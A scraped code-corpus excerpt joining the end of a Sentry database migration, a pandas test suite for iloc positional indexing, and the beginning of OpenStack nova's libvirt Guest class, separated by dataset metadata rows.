'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'team_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.TeamMember']", 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['auth.User']"})
},
'sentry.trackeduser': {
'Meta': {'unique_together': "(('project', 'ident'),)", 'object_name': 'TrackedUser'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Group']", 'through': "orm['sentry.AffectedUserByGroup']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'num_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry'] | bsd-3-clause | 607,920,004,678,667,900 | 79.549419 | 208 | 0.554244 | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/tests/indexing/test_iloc.py | 2 | 26763 | """ test positional based indexing with iloc """
from warnings import catch_warnings, filterwarnings, simplefilter
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Series, concat, date_range, isna
from pandas.api.types import is_scalar
from pandas.tests.indexing.common import Base
from pandas.util import testing as tm
class TestiLoc(Base):
def test_iloc_exceeds_bounds(self):
# GH6296
# iloc should allow indexers that exceed the bounds
df = DataFrame(np.random.random_sample((20, 5)), columns=list("ABCDE"))
# lists of positions should raise IndexError!
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[:, [0, 1, 2, 3, 4, 5]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, 30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, -30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[100]]
s = df["A"]
with pytest.raises(IndexError, match=msg):
s.iloc[[100]]
with pytest.raises(IndexError, match=msg):
s.iloc[[-100]]
# still raise on a single indexer
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[30]
with pytest.raises(IndexError, match=msg):
df.iloc[-30]
# GH10779
# single positive/negative indexer exceeding Series bounds should raise
# an IndexError
with pytest.raises(IndexError, match=msg):
s.iloc[30]
with pytest.raises(IndexError, match=msg):
s.iloc[-30]
# slices are ok
result = df.iloc[:, 4:10] # 0 < start < len < stop
expected = df.iloc[:, 4:]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -4:-10] # stop < 0 < start < len
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4:-1] # 0 < stop < len < start (down)
expected = df.iloc[:, :4:-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 4:-10:-1] # stop < 0 < start < len (down)
expected = df.iloc[:, 4::-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:4] # start < 0 < stop < len
expected = df.iloc[:, :4]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4] # 0 < stop < len < start
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:-11:-1] # stop < start < 0 < len (down)
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:11] # 0 < len < start < stop
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
# slice bounds exceeding is ok
result = s.iloc[18:30]
expected = s.iloc[18:]
tm.assert_series_equal(result, expected)
result = s.iloc[30:]
expected = s.iloc[:0]
tm.assert_series_equal(result, expected)
result = s.iloc[30::-1]
expected = s.iloc[::-1]
tm.assert_series_equal(result, expected)
# doc example
def check(result, expected):
str(result)
result.dtypes
tm.assert_frame_equal(result, expected)
dfl = DataFrame(np.random.randn(5, 2), columns=list("AB"))
check(dfl.iloc[:, 2:3], DataFrame(index=dfl.index))
check(dfl.iloc[:, 1:3], dfl.iloc[:, [1]])
check(dfl.iloc[4:6], dfl.iloc[[4]])
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl.iloc[[4, 5, 6]]
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl.iloc[:, 4]
@pytest.mark.parametrize("index,columns", [(np.arange(20), list("ABCDE"))])
@pytest.mark.parametrize(
"index_vals,column_vals",
[
([slice(None), ["A", "D"]]),
(["1", "2"], slice(None)),
([pd.datetime(2019, 1, 1)], slice(None)),
],
)
def test_iloc_non_integer_raises(self, index, columns, index_vals, column_vals):
# GH 25753
df = DataFrame(
np.random.randn(len(index), len(columns)), index=index, columns=columns
)
msg = ".iloc requires numeric indexers, got"
with pytest.raises(IndexError, match=msg):
df.iloc[index_vals, column_vals]
def test_iloc_getitem_int(self):
# integer
self.check_result(
"integer", "iloc", 2, "ix", {0: 4, 1: 6, 2: 8}, typs=["ints", "uints"]
)
self.check_result(
"integer",
"iloc",
2,
"indexer",
2,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
def test_iloc_getitem_neg_int(self):
# neg integer
self.check_result(
"neg int", "iloc", -1, "ix", {0: 6, 1: 9, 2: 12}, typs=["ints", "uints"]
)
self.check_result(
"neg int",
"iloc",
-1,
"indexer",
-1,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
@pytest.mark.parametrize("dims", [1, 2])
def test_iloc_getitem_invalid_scalar(self, dims):
# GH 21982
if dims == 1:
s = Series(np.arange(10))
else:
s = DataFrame(np.arange(100).reshape(10, 10))
with pytest.raises(TypeError, match="Cannot index by location index"):
s.iloc["a"]
def test_iloc_array_not_mutating_negative_indices(self):
# GH 21867
array_with_neg_numbers = np.array([1, 2, -1])
array_copy = array_with_neg_numbers.copy()
df = pd.DataFrame(
{"A": [100, 101, 102], "B": [103, 104, 105], "C": [106, 107, 108]},
index=[1, 2, 3],
)
df.iloc[array_with_neg_numbers]
tm.assert_numpy_array_equal(array_with_neg_numbers, array_copy)
df.iloc[:, array_with_neg_numbers]
tm.assert_numpy_array_equal(array_with_neg_numbers, array_copy)
def test_iloc_getitem_list_int(self):
# list of ints
self.check_result(
"list int",
"iloc",
[0, 1, 2],
"ix",
{0: [0, 2, 4], 1: [0, 3, 6], 2: [0, 4, 8]},
typs=["ints", "uints"],
)
self.check_result(
"list int",
"iloc",
[2],
"ix",
{0: [4], 1: [6], 2: [8]},
typs=["ints", "uints"],
)
self.check_result(
"list int",
"iloc",
[0, 1, 2],
"indexer",
[0, 1, 2],
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
# array of ints (GH5006), make sure that a single indexer is returning
# the correct type
self.check_result(
"array int",
"iloc",
np.array([0, 1, 2]),
"ix",
{0: [0, 2, 4], 1: [0, 3, 6], 2: [0, 4, 8]},
typs=["ints", "uints"],
)
self.check_result(
"array int",
"iloc",
np.array([2]),
"ix",
{0: [4], 1: [6], 2: [8]},
typs=["ints", "uints"],
)
self.check_result(
"array int",
"iloc",
np.array([0, 1, 2]),
"indexer",
[0, 1, 2],
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
def test_iloc_getitem_neg_int_can_reach_first_index(self):
# GH10547 and GH10779
# negative integers should be able to reach index 0
df = DataFrame({"A": [2, 3, 5], "B": [7, 11, 13]})
s = df["A"]
expected = df.iloc[0]
result = df.iloc[-3]
tm.assert_series_equal(result, expected)
expected = df.iloc[[0]]
result = df.iloc[[-3]]
tm.assert_frame_equal(result, expected)
expected = s.iloc[0]
result = s.iloc[-3]
assert result == expected
expected = s.iloc[[0]]
result = s.iloc[[-3]]
tm.assert_series_equal(result, expected)
# check the length 1 Series case highlighted in GH10547
expected = Series(["a"], index=["A"])
result = expected.iloc[[-1]]
tm.assert_series_equal(result, expected)
def test_iloc_getitem_dups(self):
self.check_result(
"list int (dups)",
"iloc",
[0, 1, 1, 3],
"ix",
{0: [0, 2, 2, 6], 1: [0, 3, 3, 9]},
objs=["series", "frame"],
typs=["ints", "uints"],
)
# GH 6766
df1 = DataFrame([{"A": None, "B": 1}, {"A": 2, "B": 2}])
df2 = DataFrame([{"A": 3, "B": 3}, {"A": 4, "B": 4}])
df = concat([df1, df2], axis=1)
# cross-sectional indexing
result = df.iloc[0, 0]
assert isna(result)
result = df.iloc[0, :]
expected = Series([np.nan, 1, 3, 3], index=["A", "B", "A", "B"], name=0)
tm.assert_series_equal(result, expected)
def test_iloc_getitem_array(self):
# array like
s = Series(index=range(1, 4))
self.check_result(
"array like",
"iloc",
s.index,
"ix",
{0: [2, 4, 6], 1: [3, 6, 9], 2: [4, 8, 12]},
typs=["ints", "uints"],
)
def test_iloc_getitem_bool(self):
# boolean indexers
b = [True, False, True, False]
self.check_result("bool", "iloc", b, "ix", b, typs=["ints", "uints"])
self.check_result(
"bool",
"iloc",
b,
"ix",
b,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
@pytest.mark.parametrize("index", [[True, False], [True, False, True, False]])
def test_iloc_getitem_bool_diff_len(self, index):
# GH26658
s = Series([1, 2, 3])
with pytest.raises(
IndexError,
match=("Item wrong length {} instead of {}.".format(len(index), len(s))),
):
_ = s.iloc[index]
def test_iloc_getitem_slice(self):
# slices
self.check_result(
"slice",
"iloc",
slice(1, 3),
"ix",
{0: [2, 4], 1: [3, 6], 2: [4, 8]},
typs=["ints", "uints"],
)
self.check_result(
"slice",
"iloc",
slice(1, 3),
"indexer",
slice(1, 3),
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
def test_iloc_getitem_slice_dups(self):
df1 = DataFrame(np.random.randn(10, 4), columns=["A", "A", "B", "B"])
df2 = DataFrame(
np.random.randint(0, 10, size=20).reshape(10, 2), columns=["A", "C"]
)
# axis=1
df = concat([df1, df2], axis=1)
tm.assert_frame_equal(df.iloc[:, :4], df1)
tm.assert_frame_equal(df.iloc[:, 4:], df2)
df = concat([df2, df1], axis=1)
tm.assert_frame_equal(df.iloc[:, :2], df2)
tm.assert_frame_equal(df.iloc[:, 2:], df1)
exp = concat([df2, df1.iloc[:, [0]]], axis=1)
tm.assert_frame_equal(df.iloc[:, 0:3], exp)
# axis=0
df = concat([df, df], axis=0)
tm.assert_frame_equal(df.iloc[0:10, :2], df2)
tm.assert_frame_equal(df.iloc[0:10, 2:], df1)
tm.assert_frame_equal(df.iloc[10:, :2], df2)
tm.assert_frame_equal(df.iloc[10:, 2:], df1)
def test_iloc_setitem(self):
df = self.frame_ints
df.iloc[1, 1] = 1
result = df.iloc[1, 1]
assert result == 1
df.iloc[:, 2:3] = 0
expected = df.iloc[:, 2:3]
result = df.iloc[:, 2:3]
tm.assert_frame_equal(result, expected)
# GH5771
s = Series(0, index=[4, 5, 6])
s.iloc[1:2] += 1
expected = Series([0, 1, 0], index=[4, 5, 6])
tm.assert_series_equal(s, expected)
def test_iloc_setitem_list(self):
# setitem with an iloc list
df = DataFrame(
np.arange(9).reshape((3, 3)), index=["A", "B", "C"], columns=["A", "B", "C"]
)
df.iloc[[0, 1], [1, 2]]
df.iloc[[0, 1], [1, 2]] += 100
expected = DataFrame(
np.array([0, 101, 102, 3, 104, 105, 6, 7, 8]).reshape((3, 3)),
index=["A", "B", "C"],
columns=["A", "B", "C"],
)
tm.assert_frame_equal(df, expected)
def test_iloc_setitem_pandas_object(self):
# GH 17193
s_orig = Series([0, 1, 2, 3])
expected = Series([0, -1, -2, 3])
s = s_orig.copy()
s.iloc[Series([1, 2])] = [-1, -2]
tm.assert_series_equal(s, expected)
s = s_orig.copy()
s.iloc[pd.Index([1, 2])] = [-1, -2]
tm.assert_series_equal(s, expected)
def test_iloc_setitem_dups(self):
# GH 6766
# iloc with a mask aligning from another iloc
df1 = DataFrame([{"A": None, "B": 1}, {"A": 2, "B": 2}])
df2 = DataFrame([{"A": 3, "B": 3}, {"A": 4, "B": 4}])
df = concat([df1, df2], axis=1)
expected = df.fillna(3)
expected["A"] = expected["A"].astype("float64")
inds = np.isnan(df.iloc[:, 0])
mask = inds[inds].index
df.iloc[mask, 0] = df.iloc[mask, 2]
tm.assert_frame_equal(df, expected)
# del a dup column across blocks
expected = DataFrame({0: [1, 2], 1: [3, 4]})
expected.columns = ["B", "B"]
del df["A"]
tm.assert_frame_equal(df, expected)
# assign back to self
df.iloc[[0, 1], [0, 1]] = df.iloc[[0, 1], [0, 1]]
tm.assert_frame_equal(df, expected)
# reversed x 2
df.iloc[[1, 0], [0, 1]] = df.iloc[[1, 0], [0, 1]].reset_index(drop=True)
df.iloc[[1, 0], [0, 1]] = df.iloc[[1, 0], [0, 1]].reset_index(drop=True)
tm.assert_frame_equal(df, expected)
def test_iloc_getitem_frame(self):
df = DataFrame(
np.random.randn(10, 4), index=range(0, 20, 2), columns=range(0, 8, 2)
)
result = df.iloc[2]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
exp = df.ix[4]
tm.assert_series_equal(result, exp)
result = df.iloc[2, 2]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
exp = df.ix[4, 4]
assert result == exp
# slice
result = df.iloc[4:8]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[8:14]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 2:3]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[:, 4:5]
tm.assert_frame_equal(result, expected)
# list of integers
result = df.iloc[[0, 1, 3]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[0, 2, 6]]
tm.assert_frame_equal(result, expected)
result = df.iloc[[0, 1, 3], [0, 1]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[0, 2, 6], [0, 2]]
tm.assert_frame_equal(result, expected)
# neg indices
result = df.iloc[[-1, 1, 3], [-1, 1]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[18, 2, 6], [6, 2]]
tm.assert_frame_equal(result, expected)
# dups indices
result = df.iloc[[-1, -1, 1, 3], [-1, 1]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[18, 18, 2, 6], [6, 2]]
tm.assert_frame_equal(result, expected)
# with index-like
s = Series(index=range(1, 5))
result = df.iloc[s.index]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[2, 4, 6, 8]]
tm.assert_frame_equal(result, expected)
def test_iloc_getitem_labelled_frame(self):
# try with labelled frame
df = DataFrame(
np.random.randn(10, 4), index=list("abcdefghij"), columns=list("ABCD")
)
result = df.iloc[1, 1]
exp = df.loc["b", "B"]
assert result == exp
result = df.iloc[:, 2:3]
expected = df.loc[:, ["C"]]
tm.assert_frame_equal(result, expected)
# negative indexing
result = df.iloc[-1, -1]
exp = df.loc["j", "D"]
assert result == exp
# out-of-bounds exception
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[10, 5]
# trying to use a label
msg = (
r"Location based indexing can only have \[integer, integer"
r" slice \(START point is INCLUDED, END point is EXCLUDED\),"
r" listlike of integers, boolean array\] types"
)
with pytest.raises(ValueError, match=msg):
df.iloc["j", "D"]
def test_iloc_getitem_doc_issue(self):
# multi axis slicing issue with single block
# surfaced in GH 6059
arr = np.random.randn(6, 4)
index = date_range("20130101", periods=6)
columns = list("ABCD")
df = DataFrame(arr, index=index, columns=columns)
# defines ref_locs
df.describe()
result = df.iloc[3:5, 0:2]
str(result)
result.dtypes
expected = DataFrame(arr[3:5, 0:2], index=index[3:5], columns=columns[0:2])
tm.assert_frame_equal(result, expected)
# for dups
df.columns = list("aaaa")
result = df.iloc[3:5, 0:2]
str(result)
result.dtypes
expected = DataFrame(arr[3:5, 0:2], index=index[3:5], columns=list("aa"))
tm.assert_frame_equal(result, expected)
# related
arr = np.random.randn(6, 4)
index = list(range(0, 12, 2))
columns = list(range(0, 8, 2))
df = DataFrame(arr, index=index, columns=columns)
df._data.blocks[0].mgr_locs
result = df.iloc[1:5, 2:4]
str(result)
result.dtypes
expected = DataFrame(arr[1:5, 2:4], index=index[1:5], columns=columns[2:4])
tm.assert_frame_equal(result, expected)
def test_iloc_setitem_series(self):
df = DataFrame(
np.random.randn(10, 4), index=list("abcdefghij"), columns=list("ABCD")
)
df.iloc[1, 1] = 1
result = df.iloc[1, 1]
assert result == 1
df.iloc[:, 2:3] = 0
expected = df.iloc[:, 2:3]
result = df.iloc[:, 2:3]
tm.assert_frame_equal(result, expected)
s = Series(np.random.randn(10), index=range(0, 20, 2))
s.iloc[1] = 1
result = s.iloc[1]
assert result == 1
s.iloc[:4] = 0
expected = s.iloc[:4]
result = s.iloc[:4]
tm.assert_series_equal(result, expected)
s = Series([-1] * 6)
s.iloc[0::2] = [0, 2, 4]
s.iloc[1::2] = [1, 3, 5]
result = s
expected = Series([0, 1, 2, 3, 4, 5])
tm.assert_series_equal(result, expected)
def test_iloc_setitem_list_of_lists(self):
# GH 7551
# list-of-list is set incorrectly in mixed vs. single dtyped frames
df = DataFrame(
dict(A=np.arange(5, dtype="int64"), B=np.arange(5, 10, dtype="int64"))
)
df.iloc[2:4] = [[10, 11], [12, 13]]
expected = DataFrame(dict(A=[0, 1, 10, 12, 4], B=[5, 6, 11, 13, 9]))
tm.assert_frame_equal(df, expected)
df = DataFrame(dict(A=list("abcde"), B=np.arange(5, 10, dtype="int64")))
df.iloc[2:4] = [["x", 11], ["y", 13]]
expected = DataFrame(dict(A=["a", "b", "x", "y", "e"], B=[5, 6, 11, 13, 9]))
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("indexer", [[0], slice(None, 1, None), np.array([0])])
@pytest.mark.parametrize("value", [["Z"], np.array(["Z"])])
def test_iloc_setitem_with_scalar_index(self, indexer, value):
# GH #19474
# assigning like "df.iloc[0, [0]] = ['Z']" should be evaluated
# elementwisely, not using "setter('A', ['Z'])".
df = pd.DataFrame([[1, 2], [3, 4]], columns=["A", "B"])
df.iloc[0, indexer] = value
result = df.iloc[0, 0]
assert is_scalar(result) and result == "Z"
def test_iloc_mask(self):
# GH 3631, iloc with a mask (of a series) should raise
df = DataFrame(list(range(5)), index=list("ABCDE"), columns=["a"])
mask = df.a % 2 == 0
msg = "iLocation based boolean indexing cannot use an indexable as a mask"
with pytest.raises(ValueError, match=msg):
df.iloc[mask]
mask.index = range(len(mask))
msg = "iLocation based boolean indexing on an integer type is not available"
with pytest.raises(NotImplementedError, match=msg):
df.iloc[mask]
# ndarray ok
result = df.iloc[np.array([True] * len(mask), dtype=bool)]
tm.assert_frame_equal(result, df)
# the possibilities
locs = np.arange(4)
nums = 2 ** locs
reps = [bin(num) for num in nums]
df = DataFrame({"locs": locs, "nums": nums}, reps)
expected = {
(None, ""): "0b1100",
(None, ".loc"): "0b1100",
(None, ".iloc"): "0b1100",
("index", ""): "0b11",
("index", ".loc"): "0b11",
("index", ".iloc"): (
"iLocation based boolean indexing cannot use an indexable as a mask"
),
("locs", ""): "Unalignable boolean Series provided as indexer "
"(index of the boolean Series and of the indexed "
"object do not match).",
("locs", ".loc"): "Unalignable boolean Series provided as indexer "
"(index of the boolean Series and of the "
"indexed object do not match).",
("locs", ".iloc"): (
"iLocation based boolean indexing on an "
"integer type is not available"
),
}
# UserWarnings from reindex of a boolean mask
with catch_warnings(record=True):
simplefilter("ignore", UserWarning)
result = dict()
for idx in [None, "index", "locs"]:
mask = (df.nums > 2).values
if idx:
mask = Series(mask, list(reversed(getattr(df, idx))))
for method in ["", ".loc", ".iloc"]:
try:
if method:
accessor = getattr(df, method[1:])
else:
accessor = df
ans = str(bin(accessor[mask]["nums"].sum()))
except Exception as e:
ans = str(e)
key = tuple([idx, method])
r = expected.get(key)
if r != ans:
raise AssertionError(
"[{key}] does not match [{ans}], received [{r}]".format(
key=key, ans=ans, r=r
)
)
def test_iloc_non_unique_indexing(self):
# GH 4017, non-unique indexing (on the axis)
df = DataFrame({"A": [0.1] * 3000, "B": [1] * 3000})
idx = np.arange(30) * 99
expected = df.iloc[idx]
df3 = concat([df, 2 * df, 3 * df])
result = df3.iloc[idx]
tm.assert_frame_equal(result, expected)
df2 = DataFrame({"A": [0.1] * 1000, "B": [1] * 1000})
df2 = concat([df2, 2 * df2, 3 * df2])
sidx = df2.index.to_series()
expected = df2.iloc[idx[idx <= sidx.max()]]
new_list = []
for r, s in expected.iterrows():
new_list.append(s)
new_list.append(s * 2)
new_list.append(s * 3)
expected = DataFrame(new_list)
expected = concat([expected, DataFrame(index=idx[idx > sidx.max()])], sort=True)
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
result = df2.loc[idx]
tm.assert_frame_equal(result, expected, check_index_type=False)
def test_iloc_empty_list_indexer_is_ok(self):
from pandas.util.testing import makeCustomDataframe as mkdf
df = mkdf(5, 2)
# vertical empty
tm.assert_frame_equal(
df.iloc[:, []],
df.iloc[:, :0],
check_index_type=True,
check_column_type=True,
)
# horizontal empty
tm.assert_frame_equal(
df.iloc[[], :],
df.iloc[:0, :],
check_index_type=True,
check_column_type=True,
)
# horizontal empty
tm.assert_frame_equal(
df.iloc[[]], df.iloc[:0, :], check_index_type=True, check_column_type=True
)
def test_identity_slice_returns_new_object(self):
# GH13873
original_df = DataFrame({"a": [1, 2, 3]})
sliced_df = original_df.iloc[:]
assert sliced_df is not original_df
# should be a shallow copy
original_df["a"] = [4, 4, 4]
assert (sliced_df["a"] == 4).all()
original_series = Series([1, 2, 3, 4, 5, 6])
sliced_series = original_series.iloc[:]
assert sliced_series is not original_series
# should also be a shallow copy
original_series[:3] = [7, 8, 9]
assert all(sliced_series[:3] == [7, 8, 9])
def test_indexing_zerodim_np_array(self):
# GH24919
df = DataFrame([[1, 2], [3, 4]])
result = df.iloc[np.array(0)]
s = pd.Series([1, 2], name=0)
tm.assert_series_equal(result, s)
def test_series_indexing_zerodim_np_array(self):
# GH24919
s = Series([1, 2])
result = s.iloc[np.array(0)]
assert result == 1
| apache-2.0 | 1,716,900,563,005,315,300 | 31.677656 | 88 | 0.50114 | false |
zzicewind/nova | nova/virt/libvirt/guest.py | 6 | 13722 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2015 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the guest.
This class encapsulates libvirt domain provides certain
higher level APIs around the raw libvirt API. These APIs are
then used by all the other libvirt related classes
"""
from lxml import etree
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova import utils
from nova.virt.libvirt import config as vconfig
libvirt = None
LOG = logging.getLogger(__name__)
class Guest(object):
def __init__(self, domain):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._domain = domain
def __repr__(self):
return "<Guest %(id)d %(name)s %(uuid)s>" % {
'id': self.id,
'name': self.name,
'uuid': self.uuid
}
@property
def id(self):
return self._domain.ID()
@property
def uuid(self):
return self._domain.UUIDString()
@property
def name(self):
return self._domain.name()
@property
def _encoded_xml(self):
return encodeutils.safe_decode(self._domain.XMLDesc(0))
@classmethod
def create(cls, xml, host):
"""Create a new Guest
:param xml: XML definition of the domain to create
:param host: host.Host connection to define the guest on
:returns guest.Guest: Guest ready to be launched
"""
try:
# TODO(sahid): Host.write_instance_config should return
# an instance of Guest
domain = host.write_instance_config(xml)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a domain with XML: %s') %
encodeutils.safe_decode(xml))
return cls(domain)
def launch(self, pause=False):
"""Starts a created guest.
:param pause: Indicates whether to start and pause the guest
"""
flags = pause and libvirt.VIR_DOMAIN_START_PAUSED or 0
try:
return self._domain.createWithFlags(flags)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error launching a defined domain '
'with XML: %s') %
self._encoded_xml, errors='ignore')
def poweroff(self):
"""Stops a running guest."""
self._domain.destroy()
def inject_nmi(self):
"""Injects an NMI to a guest."""
self._domain.injectNMI()
def resume(self):
"""Resumes a suspended guest."""
self._domain.resume()
def enable_hairpin(self):
"""Enables hairpin mode for this guest."""
interfaces = self.get_interfaces()
try:
for interface in interfaces:
utils.execute(
'tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error enabling hairpin mode with XML: %s') %
self._encoded_xml, errors='ignore')
def get_interfaces(self):
"""Returns a list of all network interfaces for this domain."""
doc = None
try:
doc = etree.fromstring(self._encoded_xml)
except Exception:
return []
interfaces = []
nodes = doc.findall('./devices/interface/target')
for target in nodes:
interfaces.append(target.get('dev'))
return interfaces
def get_vcpus_info(self):
"""Returns virtual cpus information of guest.
:returns: guest.VCPUInfo
"""
vcpus = self._domain.vcpus()
if vcpus is not None:
for vcpu in vcpus[0]:
yield VCPUInfo(
id=vcpu[0], cpu=vcpu[3], state=vcpu[1], time=vcpu[2])
def delete_configuration(self):
"""Undefines a domain from hypervisor."""
try:
self._domain.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags. %d"
"Retrying with undefine", self.id)
self._domain.undefine()
except AttributeError:
# Older versions of libvirt don't support undefine flags,
# trying to remove managed image
try:
if self._domain.hasManagedSaveImage(0):
self._domain.managedSaveRemove(0)
except AttributeError:
pass
self._domain.undefine()
def has_persistent_configuration(self):
"""Whether domain config is persistently stored on the host."""
return self._domain.isPersistent()
def attach_device(self, conf, persistent=False, live=False):
"""Attaches device to the guest.
:param conf: A LibvirtConfigObject of the device to attach
:param persistent: A bool to indicate whether the change is
persistent or not
:param live: A bool to indicate whether it affect the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
